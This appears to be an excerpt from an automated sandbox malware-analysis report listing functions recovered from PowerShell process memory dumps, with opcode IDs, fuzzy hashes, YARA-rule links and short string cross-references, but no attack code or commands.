Instruction Fuzzy Hash: FE0196352087445FC715DB79D99469ABFE4AF49210F1884EED089CB6A3DB61E885C701

Function 031879C2 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28be371ab80b33ff718b8e6b82144aa97861fb80717ba0a749c9d9180e4e8d42
Instruction ID: dab8900663b5dee1e41d661b272d18128b6fd18338563c3c17af8275cddd3413
Opcode Fuzzy Hash: 28be371ab80b33ff718b8e6b82144aa97861fb80717ba0a749c9d9180e4e8d42
Instruction Fuzzy Hash: 1A01D431B043448FC755DB68E890A7F7BF9EB8A22171005AEE409DB691DB30A801CB54

Function 0318DF20 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e92f7bf7e43dc88886b3e813982b3dfb8e5ce79e94e4f7da77e95187655943c0
Instruction ID: ddc46adec33e21760fad8c2153cab805e898700630201b6825855a17b520ca93
Opcode Fuzzy Hash: e92f7bf7e43dc88886b3e813982b3dfb8e5ce79e94e4f7da77e95187655943c0
Instruction Fuzzy Hash: 14019235700214CFCB119B74E848AAEBBF6FB8C319F04406DE51AD3242DB319905DB90

Function 0318DC98 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56933fb49b7216e91519e2afeb47487eda519d4784c9ee897bee2eaed58fbce5
Instruction ID: d5389400fa8a87ba1d28473be88e12fb50b0b243abd7b1023d89b7c32e83674c
Opcode Fuzzy Hash: 56933fb49b7216e91519e2afeb47487eda519d4784c9ee897bee2eaed58fbce5
Instruction Fuzzy Hash: F2110534204750CFC768DF79D09186ABBF6EF8921532489ADD08A8B7A0DB36E845CF90

Function 0318BF10 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83740fe83ad462fbfd0cd514499fef283e090d6e81c2cfa6823de5bdf5962b48
Instruction ID: b1ac17d12f0fc76334f4e7595edfcc8e4d8305246e4f0c18f3c7d7c654e58a9a
Opcode Fuzzy Hash: 83740fe83ad462fbfd0cd514499fef283e090d6e81c2cfa6823de5bdf5962b48
Instruction Fuzzy Hash: 8B01A43130D3A06FD7018B7A9C94967BFE9EF9A52071945ABF584CB362DA71CC04C761

Function 030DD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2161039523.00000000030DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e5f593bf812332f491e5f26610d1e8411dc95ef71f4faaf0fec5561c3d3840
Instruction ID: d33e7835781b661c47e21721c4d145571bf52c5a16ffe8da9c37d5898196acae
Opcode Fuzzy Hash: a2e5f593bf812332f491e5f26610d1e8411dc95ef71f4faaf0fec5561c3d3840
Instruction Fuzzy Hash: 4C01F7310063009AE720CA29DD84B67FFDCEF86324F1CC86AED480A246C2799845CAB1

Function 030DD006 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2161039523.00000000030DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3ee1bee278d3977d3b39ae1641ea95f35f59e5f44ddc7acc647ac006825a56
Instruction ID: 7ad8fe1e82ac7a9d8a4fdb3ea980554463a6c577ce33f94de8e6752689cf69c7
Opcode Fuzzy Hash: fd3ee1bee278d3977d3b39ae1641ea95f35f59e5f44ddc7acc647ac006825a56
Instruction Fuzzy Hash: D701527140E3C09ED7128B259894B52BFB8DF53224F1D85DBD9888F197C2695844C772

Function 03187958 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 932a72a7c1205affc7648e71c53ee30642edcf967d423be9c79dd03753960bbf
Instruction ID: 817d59d48f292a98401916a5b383f4d5c6c035e035fcde1ef27f6e1d787afac6
Opcode Fuzzy Hash: 932a72a7c1205affc7648e71c53ee30642edcf967d423be9c79dd03753960bbf
Instruction Fuzzy Hash: CDF0C2317053509FC715D769E8949AF7BE9EF8A22070005AEE04AC76A1DF346846C761

Function 030DD8D3 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2161039523.00000000030DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed6059a560c0ee3fb0a9e3a53c992e867d7b16dc7d3c9fdac17be3c062a36ca
Instruction ID: c622c19889175f2f3322f20781546b21c4beb07422e42336aa816e81f8ff04a6
Opcode Fuzzy Hash: 8ed6059a560c0ee3fb0a9e3a53c992e867d7b16dc7d3c9fdac17be3c062a36ca
Instruction Fuzzy Hash: DCF0F976200600AF9720CF0AD984C27FBEDEFD4770319C55AE84A4B626C671EC42CEA0

Function 031890D8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ce61c91d1600438f185759831c633ce5e616b11644d06135a7987b3f3cfb18e
Instruction ID: 115a63e346af1390e959f427e49d328c3868764d5141b5820a2d3f858b7756c7
Opcode Fuzzy Hash: 1ce61c91d1600438f185759831c633ce5e616b11644d06135a7987b3f3cfb18e
Instruction Fuzzy Hash: 07F022396083044FD305AF68C0493EBBBA1DFC2318F15819AC40A8B382CE396C06CBE2

Function 0318DEC1 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af9a2720ccfb64140351b234a3f853230c66904d30c1642785f68b349236fc12
Instruction ID: 0329f6361389c437c5a887c5de6bd5b551245ac2bbc3b1eb516cf86d056a5662
Opcode Fuzzy Hash: af9a2720ccfb64140351b234a3f853230c66904d30c1642785f68b349236fc12
Instruction Fuzzy Hash: 08F0DA357146819FC3159B2DE494866BBF6AFDA62132901EBE085CF376CA21DC05CBA1

Function 030DD8C4 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2161039523.00000000030DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44a12d8226ae2159a61d094a987c683cbe166719dcec0d7899bc5979627cae98
Instruction ID: 5df9d4bad8ef30ee608fe61985a89a38dc4557a7019b0b4d32d8d565488c9086
Opcode Fuzzy Hash: 44a12d8226ae2159a61d094a987c683cbe166719dcec0d7899bc5979627cae98
Instruction Fuzzy Hash: 9DF0F975100B80AFD725CF16CD84D23BBF9EF85624B198489E84A4B726C631FC42CF60

Function 03189158 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ab4a420f6bad656691b174779395d5cdbb89aa50dc9df1e47833737c79b80e9
Instruction ID: ff35913f2f6e159a561fbbd88c4b7a6f7f9667553b6b6ad2b9657cc93f2fcc32
Opcode Fuzzy Hash: 4ab4a420f6bad656691b174779395d5cdbb89aa50dc9df1e47833737c79b80e9
Instruction Fuzzy Hash: 37F0BE705093405FC7619B78D4E839ABFE4EF46220F0444AED14ECB282CB396885CB91

Function 03187968 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14130dfcd2e4ea7a4ad46a910f9eeb9c8b1b34c8963c0be082806a5c2d3258ed
Instruction ID: 7e76e5eab112c276cf5a5b1a68f432e40bddd6ae21c05a163638c79dc1c567c6
Opcode Fuzzy Hash: 14130dfcd2e4ea7a4ad46a910f9eeb9c8b1b34c8963c0be082806a5c2d3258ed
Instruction Fuzzy Hash: A3F082357007149FC714A759E844A6FB7E9EB89261B00052DF109D7650DF34AC0287A4

Function 0318DD0F Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c05870bd3fa44c583b1aac391166d6ba092da94bfd466ea86f8f7699eed0b0f
Instruction ID: 3a1e1952a3dcd5ca215d7f344c8de12da18d32667cbd1d365a77d05f8542a229
Opcode Fuzzy Hash: 8c05870bd3fa44c583b1aac391166d6ba092da94bfd466ea86f8f7699eed0b0f
Instruction Fuzzy Hash: 60F0E5353057905BC716933C781489F7FEADEC617131401AFD089DB252DF5588068BE6

Function 031890E8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8be2157c1f9b68a8a88761840ac77fc2dbb58910ca9469ffaa9456e6110dea17
Instruction ID: 41cc5455f77209671b97200172ddb276451597198dda9cab491facf008faf65c
Opcode Fuzzy Hash: 8be2157c1f9b68a8a88761840ac77fc2dbb58910ca9469ffaa9456e6110dea17
Instruction Fuzzy Hash: DEF027396042044BD704AF68C0493EB77D6DBC6718F10816AD50A4B3C4CE396806CBE1

Function 03187697 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52505d3482d3aaff6ce11a0d29c8be43ba77801c3053d952c4885d1655dbe3f1
Instruction ID: 5057abf369c1bc557935fbc226d7085a4a2d1d5179cd34896a754acad6a5f31e
Opcode Fuzzy Hash: 52505d3482d3aaff6ce11a0d29c8be43ba77801c3053d952c4885d1655dbe3f1
Instruction Fuzzy Hash: 59F0A7397002048FDB00DB6D9800699B7E6EFCC2517294195E509CB364DF34CC058F91

Function 0318DED0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46db20e1816a10b7e2c59dc919771462402cd10087ca7274dbce2d68d8ff06db
Instruction ID: 599305c1435a92dcafadb46389921aefcaeb3c21480b79e16d704427c3364acc
Opcode Fuzzy Hash: 46db20e1816a10b7e2c59dc919771462402cd10087ca7274dbce2d68d8ff06db
Instruction Fuzzy Hash: 1CE0E5357102118F8614EB1DE498C66BBEAEFCE62532900AAF549DB375DB61EC028B94

Function 03189542 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 603032c5ed5e1fe3412a4491e1fc42af8561d9e71564a36c5d7b3e92865cbed3
Instruction ID: 8e65c054b2b5764eefeac63244a95cd3c2d6603f759fbcfa9e3f869b7708d69e
Opcode Fuzzy Hash: 603032c5ed5e1fe3412a4491e1fc42af8561d9e71564a36c5d7b3e92865cbed3
Instruction Fuzzy Hash: EAE09A2634A2D11B875AA3BD54502BB6FDA4FCA06031E00ABC945CF293DA408802CBAA

Function 0318896A Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1758a197afecdbf27727e92669a2ffee2546ec20101c2d9c704a98330e88e6
Instruction ID: 9bc1af14e1f26a0159287ec2de89f1bb50443a687d2421ba89203862ca27e5bc
Opcode Fuzzy Hash: 9b1758a197afecdbf27727e92669a2ffee2546ec20101c2d9c704a98330e88e6
Instruction Fuzzy Hash: 47F0A7353097905BC70A677894581ED7FA19BC6228F0500AFD505CB243CE2809098796

Function 0318DD60 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1735f9a35253f7529254409d6dcb31dcadc82d11554eeff9f26e9a01e13b128a
Instruction ID: aa4e5f32d0197ce169778b295fb2d18f175332eee80785e8693450b6de6b6bdc
Opcode Fuzzy Hash: 1735f9a35253f7529254409d6dcb31dcadc82d11554eeff9f26e9a01e13b128a
Instruction Fuzzy Hash: B9E0E532A04284AB870CD768E4808E9BFE19F88230F1584BFD4469B352CA325496C791

Function 0318AF88 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5491a5749d7f795fae7e17e4cfde761698851bc4081ef1a045eec7e94d190f9
Instruction ID: fb7d3e7f25516a7f8d326bd218c050651dc186573c67ace080876356e98e4ed6
Opcode Fuzzy Hash: e5491a5749d7f795fae7e17e4cfde761698851bc4081ef1a045eec7e94d190f9
Instruction Fuzzy Hash: 73E09A2670D2D11B8B16923D64A04AAAFB28ECB12031D81FBE084CF247C9928C46C7A1

Function 03189168 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c48d1e2ae1932d28e7eb09610f6929c08a687206d576a808a07e009d4041300c
Instruction ID: 4574c305761beb860cb47d10f77e1c55d2a378561764a1fb740a5a3586a2aa9d
Opcode Fuzzy Hash: c48d1e2ae1932d28e7eb09610f6929c08a687206d576a808a07e009d4041300c
Instruction Fuzzy Hash: 21F06D749013044BD360DB78D4DD39ABBE9FB45324F00446DD21EC7340DB3968858B90

Function 03188978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 043dd841957f82d250ffe5df1e90f3327e8dcbae475da4d83b88a913b3b3a937
Instruction ID: f00f61093219c818d238101dbdd957c13c7d8d3be1ff970750a8d6a5f9f31424
Opcode Fuzzy Hash: 043dd841957f82d250ffe5df1e90f3327e8dcbae475da4d83b88a913b3b3a937
Instruction Fuzzy Hash: 5FE0263930471457CB083778A44C2EE7A96EBC976CF00002ED60A87341CF385D0A93EA

Function 03189550 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d20b619ea3082fb33e3db7399552d5058ea432af819018647d80f5e1e265085d
Instruction ID: 82a9f83a44be0fa9472ea6b077d6878dddf9fb0515dfae8a9c7d0365b0814dc7
Opcode Fuzzy Hash: d20b619ea3082fb33e3db7399552d5058ea432af819018647d80f5e1e265085d
Instruction Fuzzy Hash: C3D05E16782222174558F6FE58006BBA1CF8BCD5A174A00379A09CB381EF40CC018BFD

Function 0318DD20 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6427cfb3a2cbbf30a75ccbf25ac0cdeb20837292cb3e228bcdf2a362d1dd8d
Instruction ID: dd4d5ce1e892bc3910d869885804456bf6240959c09b7393f87b5cbb289bbdae
Opcode Fuzzy Hash: 5d6427cfb3a2cbbf30a75ccbf25ac0cdeb20837292cb3e228bcdf2a362d1dd8d
Instruction Fuzzy Hash: 5EE08C35300B144B8615A62EB82089F7ADFEFC8665314452EE04987380DF64D8068BEA

Function 0318DD70 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: befa4e5d6b1378c1a8d2ddae4c1536208cedf3c81325d89335dcf009530a97ce
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 37E08631B00114978B08E799E4514D9F7A5DFCC220F04847ED91AA7380DB3269568BA5

Function 03188739 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f9cb33bed82a0f0d1517eb1bfd536f8e5d9b3bc6bcac1dd0df149b840fb91d1
Instruction ID: 5af1b2e388ef77a5544204fb6b548554afe81c1c5a8e36c20a85261a56c1fa3c
Opcode Fuzzy Hash: 4f9cb33bed82a0f0d1517eb1bfd536f8e5d9b3bc6bcac1dd0df149b840fb91d1
Instruction Fuzzy Hash: BAE04F319041499BCF09BBB4E89A4EDBFB0EE15315F40019DD95652592DA61198ACBC0

Function 0318F460 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e181433a4c95a3be4beac521e0170d9ebb9f5e72667db762982c8f920c0a51a8
Instruction ID: bffcb736febfc02f23ad2ad096aa0abe043a4b500e9b819289b8293e42afbcd7
Opcode Fuzzy Hash: e181433a4c95a3be4beac521e0170d9ebb9f5e72667db762982c8f920c0a51a8
Instruction Fuzzy Hash: FDE09270D082496F8B50EFBC880186AFFF09B49214F6482AE9959D7352E7329903CFC0

Function 03188800 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8016861bf677693c519b3a3abc404680e827a8544fe50cf2680a3606c5e869a1
Instruction ID: b3e8259d77caa1a7fa75b5f7762704621e0f6d6d27b923aafa5a14498bfb371a
Opcode Fuzzy Hash: 8016861bf677693c519b3a3abc404680e827a8544fe50cf2680a3606c5e869a1
Instruction Fuzzy Hash: 08E048359082465BCB49DFB8E08646EBFF0DF55214F10419ED94597203D6314486DF81

Function 0318F470 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 972153051e84fa84e83e93bf1a1a3eba662f148024189970e11665535e28579e
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 1CD067B0D042099F8784EFADD94156EFBF4EB48210F6085AA8919E7301E7329A52CFD5

Function 03188748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d393abf53c003b98eb3074ff26e337d6ce18702afe0ba98e0e485d9475b65b47
Instruction ID: 84dfc8b106b90339304adae03fe2a7aa0dab5896c6260fabd3e808285319478b
Opcode Fuzzy Hash: d393abf53c003b98eb3074ff26e337d6ce18702afe0ba98e0e485d9475b65b47
Instruction Fuzzy Hash: D6D042318041098B8F08BBA4E89A4ADBB74EA14205F40416DDA1652591AA311A5ADEC5

Function 03188810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 409db41de94df251e690753ec9bb4aa695fffc760567c0fefe40f2e231338a9b
Instruction ID: ef2afc723cd53f6d6a03bb166e25645c3af431928b40be284a6836cb7f5d3e7b
Opcode Fuzzy Hash: 409db41de94df251e690753ec9bb4aa695fffc760567c0fefe40f2e231338a9b
Instruction Fuzzy Hash: 71D01734E0820A8B8B48EFA4E48686EBBB4EB48204F008169DD0993340EA305846DFC1

Function 03187932 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3f47014f5401d4a0da341b1309a79dba08006e420ccde3538d59e4da876d68
Instruction ID: 2789beaadf5b1a6755ae009d766aaacbbdcaea2336d71ab89f9ea7c4c37a378b
Opcode Fuzzy Hash: ad3f47014f5401d4a0da341b1309a79dba08006e420ccde3538d59e4da876d68
Instruction Fuzzy Hash: 84D092345093848FC71ADF74D4A48503F71EF4B21935608DEE04A8F6F2DB35A44ADB15

Function 03187EA0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1ab269e8b19743b32a1a5a848d8891eb66c162cca8dd81108215e53c15dd3ac
Instruction ID: e172301db673fdb4af81b3b789ee1baef63c40035e0e05f7158a63fa419c93fb
Opcode Fuzzy Hash: f1ab269e8b19743b32a1a5a848d8891eb66c162cca8dd81108215e53c15dd3ac
Instruction Fuzzy Hash: 07C08C309087804FEF06CB318CB64113F71DE9720030705C3DE028B8B2DD249809D741

Function 03187940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9489a319db78e4f26ac8bc5de1d3eaf45dda377ed67aa9bfc8ccd7ceff2346b2
Instruction ID: a08524e0cf37574d708d987c8819bcf2d767ed776123c5dce28b410574f2526a
Opcode Fuzzy Hash: 9489a319db78e4f26ac8bc5de1d3eaf45dda377ed67aa9bfc8ccd7ceff2346b2
Instruction Fuzzy Hash: F4B0923004870C8FC2586F79A8448147329EB4621938004ECE90E4A6928E3AE88ACA45

Non-executed Functions

Function 079A0FDD Relevance: 17.8, Strings: 14, Instructions: 299COMMON

Download Yara Rule

Strings

$]q, xrefs: 079A1239
tP]q, xrefs: 079A1133
`Q]q, xrefs: 079A1153
`Q]q, xrefs: 079A115F
$]q, xrefs: 079A1065
$]q, xrefs: 079A1253
`Q]q, xrefs: 079A10ED
$]q, xrefs: 079A1081
$]q, xrefs: 079A1229
`Q]q, xrefs: 079A1193
$]q, xrefs: 079A1263
tP]q, xrefs: 079A1127
$]q, xrefs: 079A1044
fbq, xrefs: 079A10A2

Memory Dump Source

Source File: 0000000A.00000002.2323119219.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: fbq$`Q]q$`Q]q$`Q]q$`Q]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-4154959921
Opcode ID: 04e76a1a1de718fa4e09ccbb2aa65f1f09148479bb65d5ce88683b9d3edc5a29
Instruction ID: 0f327c0333fd4ea608a1f734b0215d9686d2b5acb4724c797e58833cc4467298
Opcode Fuzzy Hash: 04e76a1a1de718fa4e09ccbb2aa65f1f09148479bb65d5ce88683b9d3edc5a29
Instruction Fuzzy Hash: 75B1E5B068121EEFCF18CF58C940AAA7BFABF45305F144865E8019B291DB75DC51CBE1

Function 079A3678 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

4']q, xrefs: 079A372E
$]q, xrefs: 079A382A
$]q, xrefs: 079A37FF
4']q, xrefs: 079A3722
$]q, xrefs: 079A3836

Memory Dump Source

Source File: 0000000A.00000002.2323119219.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: d236979f14765d059742ff0ec6ef311e70b88de38bd0480bc120b7d6a36f0158
Instruction ID: 0ad3b96c475f3a491fb8436b862adad8971e8db99ce5f34865056064cb6887c5
